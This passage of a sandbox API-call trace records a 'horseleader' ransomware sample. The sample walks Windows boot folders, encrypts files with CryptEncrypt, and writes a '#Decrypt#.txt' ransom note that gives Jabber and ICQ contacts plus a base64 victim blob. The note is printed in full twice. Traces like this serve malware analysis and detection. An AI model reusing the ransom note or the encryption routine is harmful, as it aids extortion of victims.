| out: hHeap=0x780000) returned 1 [0121.743] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Fonts", cAlternateFileName="")) returned 1 [0121.743] lstrcmpiW (lpString1="Fonts", lpString2="Windows") returned -1 [0121.743] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0121.743] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0121.743] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0121.744] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\Fonts", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.744] GetProcessHeap () returned 0x780000 [0121.744] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.744] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\*") returned 19 [0121.744] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.773] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.774] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\.") returned 19 [0121.774] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.774] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.774] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.774] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\..") returned 20 [0121.774] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.774] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.775] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0121.775] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Windows") returned -1 [0121.775] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0121.775] StrStrIW (lpFirst="chs_boot.ttf", lpSrch=".horseleader") returned 0x0 [0121.775] lstrcmpW (lpString1="chs_boot.ttf", lpString2="#Decrypt#.txt") returned 1 [0121.775] lstrcmpW (lpString1="chs_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0121.775] lstrlenW (lpString=".testttjffg") returned 11 [0121.776] StrStrW (lpFirst="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf", lpSrch=".testttjffg") returned 0x0 [0121.776] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.776] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.776] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.776] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0121.776] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Windows") returned -1 [0121.777] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0121.777] StrStrIW (lpFirst="cht_boot.ttf", lpSrch=".horseleader") returned 0x0 [0121.777] lstrcmpW (lpString1="cht_boot.ttf", lpString2="#Decrypt#.txt") returned 1 [0121.777] lstrcmpW (lpString1="cht_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0121.777] lstrlenW (lpString=".testttjffg") returned 11 [0121.777] StrStrW (lpFirst="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf", lpSrch=".testttjffg") returned 0x0 [0121.777] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.777] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.778] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.781] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0121.781] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Windows") returned -1 [0121.781] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0121.781] StrStrIW (lpFirst="jpn_boot.ttf", lpSrch=".horseleader") returned 0x0 [0121.781] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="#Decrypt#.txt") returned 1 [0121.781] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0121.781] lstrlenW (lpString=".testttjffg") returned 11 [0121.781] StrStrW (lpFirst="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf", lpSrch=".testttjffg") returned 0x0 [0121.781] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.782] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.782] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.782] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0121.782] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Windows") returned -1 [0121.782] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0121.782] StrStrIW (lpFirst="kor_boot.ttf", lpSrch=".horseleader") returned 0x0 [0121.782] lstrcmpW (lpString1="kor_boot.ttf", lpString2="#Decrypt#.txt") returned 1 [0121.783] lstrcmpW (lpString1="kor_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0121.783] lstrlenW (lpString=".testttjffg") returned 11 [0121.783] StrStrW (lpFirst="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf", lpSrch=".testttjffg") returned 0x0 [0121.783] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.783] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.783] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.783] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0121.784] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Windows") returned -1 [0121.784] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0121.784] StrStrIW (lpFirst="wgl4_boot.ttf", lpSrch=".horseleader") returned 0x0 [0121.784] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="#Decrypt#.txt") returned 1 [0121.784] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0121.785] lstrlenW (lpString=".testttjffg") returned 11 [0121.785] StrStrW (lpFirst="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf", lpSrch=".testttjffg") returned 0x0 [0121.785] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.785] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.785] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.785] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0121.786] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.786] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\#Decrypt#.txt") returned 31 [0121.786] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\#Decrypt#.txt" (normalized: "c:\\boot\\fonts\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.789] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.790] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.791] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.791] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.791] CloseHandle (hObject=0x200) returned 1 [0121.805] GetProcessHeap () returned 0x780000 [0121.805] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.805] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0121.805] lstrcmpiW (lpString1="fr-FR", lpString2="Windows") returned -1 [0121.805] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0121.806] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0121.806] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0121.806] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\fr-FR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.806] GetProcessHeap () returned 0x780000 [0121.806] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.806] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\*") returned 19 [0121.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.815] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.815] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\.") returned 19 [0121.815] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.815] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.815] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.815] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\..") returned 20 [0121.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.816] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.816] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.816] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0121.816] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.816] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.816] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.816] lstrlenW (lpString=".testttjffg") returned 11 [0121.817] StrStrW (lpFirst="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.817] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.817] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.817] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.817] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.817] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.818] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\#Decrypt#.txt") returned 31 [0121.818] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\#Decrypt#.txt" (normalized: "c:\\boot\\fr-fr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.818] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.818] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.820] lstrlenA 